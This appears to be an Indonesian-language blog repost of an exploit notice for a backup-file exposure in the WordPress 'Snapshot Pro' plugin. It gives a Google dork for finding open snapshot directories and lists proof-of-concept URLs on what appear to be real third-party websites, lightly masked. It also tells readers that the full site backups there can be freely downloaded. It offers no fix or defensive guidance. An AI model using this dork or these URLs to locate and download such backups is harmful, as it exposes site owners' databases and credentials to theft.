WordPress 'Snapshot Pro' Plugin Paparan Backup File untuk Kontrol sah

Simpan Postingan

# WordPress 'Snapshot Pro' Plugin Paparan Backup File untuk Kontrol sah
# CWE: cwe-530
# Risiko: Tinggi
# Penulis: Hugo Santiago dos Santos
# Hubungi: hugo.s@linuxmail.org
# Tanggal: 15/05/2015
# Penjual Homepage: https://premium.wpmudev.org/project/snapshot/
# Google Dork: "Index of" + / wp-content / uploads / snapshots /

# PoC:

http://trapshootingonXline.com/wp-content/uploads/snapshots/"RANDOM DIR "/" NAMA CADANGAN "
http://trapshootingoXnline.com/wp-content/uploads/snapshots/
http://forsythchurcXhofchrist.net/wp-content/uploads/snapshots/
http://www.bardoXlatry.com/wp-content/uploads/snapshots/4ljtmn0hfg0kvmifobvrfdsdv2/

# Xploit:

Setelah menggunakan Dork Google ("Index of" + / wp-content / uploads / snapshots /), kita dapat mengakses direktori backup secara bebas ("/ wp-content / uploads / snapshots /"), dan semua backup akan berada di sana untuk mengunduh (Compress .tar.gz).

Dork Exploitations Hacking Vuln

Oktober 10, 2015 • 0 komentar

Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.